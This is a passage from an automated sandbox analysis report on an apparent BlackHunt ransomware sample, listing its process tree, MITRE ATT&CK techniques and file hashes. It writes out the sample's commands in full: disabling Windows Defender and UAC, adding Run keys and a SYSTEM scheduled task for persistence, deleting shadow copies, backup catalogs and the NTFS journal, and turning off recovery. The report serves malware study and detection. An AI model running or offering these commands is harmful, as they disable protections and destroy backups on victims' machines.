f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 57 PID 2780 wrote to memory of 1488 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 57 PID 2780 wrote to memory of 1488 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 57 PID 1524 wrote to memory of 1076 1524 cmd.exe 58 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe"C:\Users\Admin\AppData\Local\Temp\f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2780 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2504
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:1984
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2204
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:980
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1488
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:572
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1092
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:604
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:780
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1956
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2260
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1816
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1836
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1044
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:692
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2564
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1944
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1792
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2820
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1656
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1660
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2964
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe" /F2⤵PID:2860
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe" /F3⤵
- Creates scheduled task(s)
PID:672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3040
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1552
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3056
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3048
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:3036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1236
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:676
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1936
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:808
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1308
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:936
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2232
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2091246139309635215-822438009-2111469512293469732055036302-1706376465-568183572"1⤵PID:1756
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2108
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2828
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD595313fd620bce5605891e3b417d31f59
SHA100822740b99531f12be897a467a5536643b63880
SHA25644c6c8ffa23e2b90875abf879823c7554eebffcfc0f3ef5faab4dbfe51b2d069
SHA512b0d5fe70012ce01b7c44ecfa6f305ea8bf11e894402e92a46c619173d4c04e819c97aaa8600ec92e65c6b076b15bfad8b28ec391a811f9b0bf3fafacd5960bf7
-
Filesize
12KB
MD52fc8fe66aefb4ed4545dbbc4f235323a
SHA1d8351431c80b1fe1e8fc2e8d95afdb1b35d9dc64
SHA2563ad715fdbaa522fba0a60e636251ed0c74e9689ba30fd45c564f2aa4f4e15e17
SHA5125775db7b5c62c17736386389d38405e8f374cd9995a22012d2aa9e1d4a0afccb9eda35a1d30ddc09309b43ef54488803d598fc37309c6b35d1fd2fff3a111a50
-
Filesize
684B
MD5dc33aa06c7e914716f86dc1b4d81c244
SHA160d056cca3c7eaea98a6adf1b4768d3dd345fe20
SHA256ba6f71cf537dcde77536b525a3550161044cddabeeb50c45adb5db5de39c097f
SHA51289fbab9d59160776caeacc8feebeed01f9b3bc3136d798bea887a368a86c3c7121f4b0dbd48396ddb746e384f7cdf5f2aab76396b1b48f01e93be5e52d53f269